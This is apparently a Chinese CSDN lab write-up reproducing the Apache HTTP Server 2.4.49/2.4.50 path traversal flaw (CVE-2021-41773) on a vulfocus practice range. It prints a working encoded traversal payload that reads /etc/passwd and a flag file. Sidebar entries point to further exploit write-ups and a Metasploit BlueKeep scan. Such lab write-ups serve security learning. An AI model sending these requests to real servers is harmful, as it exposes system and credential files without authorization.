【路径穿越】vulfocus/apache-cve_2021_41773

于 2023-11-16 21:18:24 发布
阅读量230 收藏
点赞数
分类专栏: 漏洞库 文件读取 文件包含 文章标签: apache
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wj33333/article/details/134450892
版权

1.1漏洞描述

漏洞编号cve_2021_41773
漏洞类型路径穿越
漏洞等级高危
漏洞环境vulfocus
攻击方式

1.2漏洞等级

高危

1.3影响版本

Apache HTTP Server 2.4.49、2.4.50

1.4漏洞复现

1.4.1.基础环境

靶场VULFOCUS
工具BurpSuite

1.4.2.前提

1.5深度利用

1.5.1漏洞点

        利用网上爆出得poc代码尝试获取/etc/passwd中得内容,poc如下,可轻松得到敏感内容

/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd

查看/tmp/flag

/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/tmp/flag

 拿到flag

flag-{bmhd9509045-100c-4d25-8e8b-11f345f94b4e}

1.6漏洞挖掘

1.6.1指纹信息

1.7修复建议

  • 升级

  • 打补丁

  • 上设备

wj33333
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
vulfocus——apache(cve_2021_41773)
m0_62063669的博客
09-22 881
攻击者可以通过路径遍历攻击将 URL 映射到预期文档根目录之外的文件,如果文档根目录之外的文件不受“requireall denied”访问控制参数的保护(默认禁用),则这些恶意请求就会成功。除此之外,该漏洞还可能会导致泄漏 CGI 脚本等解释文件的来源。Apache HTTP Server 2.4.49、2.4.50版本对路径规范化所做的更改中存在一个路径穿越漏洞,攻击者可利用该漏洞读取到Web目录外的其他文件,如系统配置文件、网站源码等,甚至在特定情况下,攻击者可构造恶意请求执行命令,控制服务器。
【漏洞复现-Apache-目录穿越文件读取-RCE】vulfocus/apache(cve_2021_41773)
10-07 2130
Apache-目录穿越文件读取-RCE】
[GFCTF 2021]Baby_Web的CVE-2021-41773
Aiwin的博客
06-05 1517
[GFCTF 2021]Baby_Web的CVE-2021-41773
CVE-2021-41773 goby exp
不光要学,知识要能说出口
10-28 256
CVE-2021-41773 goby exp代码 代码 { "Name": "Apache HTTP Server Arbitrary File Read(CVE-2021-41773)", "Level": "2", "Tags": [ "fileread" ], "GobyQuery": "server=\"Apache/2.4.49\"||product=\"Apache-Web-Server\"||server=\
CVE-2021-41773漏洞复现
dreamthe的博客
10-18 7654
1.安装debian系统 首先我选择的系统是debian10版本,也可以在别的系统完成复现,我想一个纯净版,所有重新安装了一个系统,安装步骤简单展示一下。 1.创建虚拟机,点击下一步。 导入镜像 自己选安装的位置以及虚拟机的名称。 安装过程需要设置管理员密码和新建一个用户,自己设置一下就可以了 这里选择了第二个。 因为之前我们选择了lvm,那么这里选择是就可以了 因为我们需要一个简单系统,所有只选择了下面三个安装软件 中间少的部分就是一直点击继续就可..
CVE-2020-13925 Apache Kylin 远程命令执行漏洞.md
04-12
CVE-2020-13925 Apache Kylin 远程命令执行漏洞
CVE-2021-26295 Apache OFBiz 反序列化漏洞.md
04-13
CVE-2021-26295 Apache OFBiz 反序列化漏洞
CVE-2018-8174_EXP:CVE-2018-8174_python
05-16
CVE-2018-8174_EXP 用法:CVE-2018-8174.py [-h] -u URL -o输出[-i IP] [-p端口] 针对CVE-2018-8174的漏洞利用 可选参数:-h,--help显示此帮助消息并退出-u URL,--url URL exp url -o OUTPUT,--output OUTPUT...
laravel-CVE-2021-3129-EXP-main.zip 写shellexp
12-17
CVE-2021-3129-EXP 自动写shell的exp
第六届“强网杯”青少年专项赛 writewp by 楠辞姐姐后援团
JEWSWS的博客
09-11 2439
这次比赛难度很大,Crypto部分也全都是猜谜语类型的题目,没啥游戏体验,不过好在排名在前30.本篇WP为团队WP,团队成员为:树木,AcexZe,Lenyi战队名称:楠辞姐姐后援团战队排名:24。
【安全漏洞】CVE-2021-41773CVE-2021-42013漏洞分析
qq_53058639的博客
01-06 349
Apache HTTP Server 2.4.49版本使用的函数在对路径参数进行规范化时会先进行url解码,然后判断是否存在../当检测到路径中存在%字符时,如果紧跟的2个字符是十六进制字符,就会进行url解码,将其转换成标准字符,如%2e->,转换完成后会判断是否存在../。如果路径中存在%2e./形式,就会检测到,但是出现.%2e/这种形式时,就不会检测到,原因是在遍历到第一个字符时,此时检测到后面的两个字符是%2而不是./,就不会把它当作路径穿越符处理,因此可以使用.%2e/或者%2e%2e。
apache-CVE-2021-41773[42013]-漏洞复现
csd_ct的专栏
02-05 3120
apache-CVE-2021-41773[42013] 验证及复现 CVE-2021-41773 影响范围为2.4.49 CVE-2021-42013 影响范围为2.4.49/50 漏洞验证 41773和42013在10月份时,被暴出目录穿越和远程命令执行,虽然只影响了apache的49/50版本,但是RCE漏洞,POC已公开,还是有较强的杀伤力。为了快速验证一下该漏洞,使用vulfocus提供的在线的靶场,开启应用,如图 访问应用首页,可得到apche服务器版本信息,如图, 验证目录遍历 利用网上爆
apache代码执行(cve-2021-41773)漏洞复现
weixin_42675091的博客
09-23 861
apache代码执行(cve-2021-41773)漏洞复现
CVE-2021-41773(42013) Apache HTTP Server路径穿越漏洞复现
weixin_45260839的博客
06-03 5541
CVE-2021-41773(42013) Apache HTTP Server路径穿越漏洞复现
Apache HTTP Server 路径穿越漏洞复现(CVE-2021-41773 )
qq_59975439的博客
06-10 5856
Apache HTTP Server 路径穿越漏洞复现(CVE-2021-41773 )
CVE-2021-41773 Apache2.4.49&50 路径穿越漏洞复现
chen5225的博客
11-01 728
CVE-2021-41773 Apache2.4.49&50 路径穿越漏洞复现
服务攻防-中间件安全&CVE复现&IIS&Apache&Tomcat&Nginx漏洞复现
ran的博客
05-13 2503
ISS中间件(Internet Security and Acceleration Server Middleware)是微软公司推出的一种安全中间件,旨在提供高效的安全代理服务和网络加速功能。它是Microsoft Proxy Server和Microsoft Firewall产品的继承者,也是Microsoft Forefront TMG(Threat Management Gateway)的前身。
Mituan-极客时间-漏洞挖掘与智能攻防实战
Aiwin的博客
10-18 1497
Mituan-极客时间-漏洞挖掘与智能攻防实战
如何利用 auxiliary/scaner/rdp/cve_2019_0708_bluekeep 扫描windows xp 靶机观察是否存在bluekeep漏洞
最新发布
05-25
以下是使用 auxiliary/scaner/rdp/cve_2019_0708_bluekeep 模块扫描 Windows XP 靶机观察是否存在 BlueKeep 漏洞的步骤: 1. 打开 Metasploit 控制台并输入 `use auxiliary/scanner/rdp/cve_2019_0708_bluekeep` 以使用该模块。 2. 输入 `set RHOSTS <靶机IP地址>` 以指定要扫描的目标。如果需要扫描多个目标,则可以使用 CIDR 格式指定一个 IP 范围。 3. 如果需要修改扫描的端口号,则可以使用 `set RPORT <端口号>` 命令进行修改。默认情况下,该模块会扫描 3389 端口。 4. 输入 `run` 命令开始扫描。扫描完成后,Metasploit 将会显示目标是否存在 BlueKeep 漏洞。 注意:使用该模块需要在 Metasploit 中设置正确的漏洞利用模块和 payload。如果您不熟悉 Metasploit 的使用,建议在专业人士的指导下进行操作。此外,请确保您已经获得了您要扫描的系统的合法授权许可,否则可能会触犯法律。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值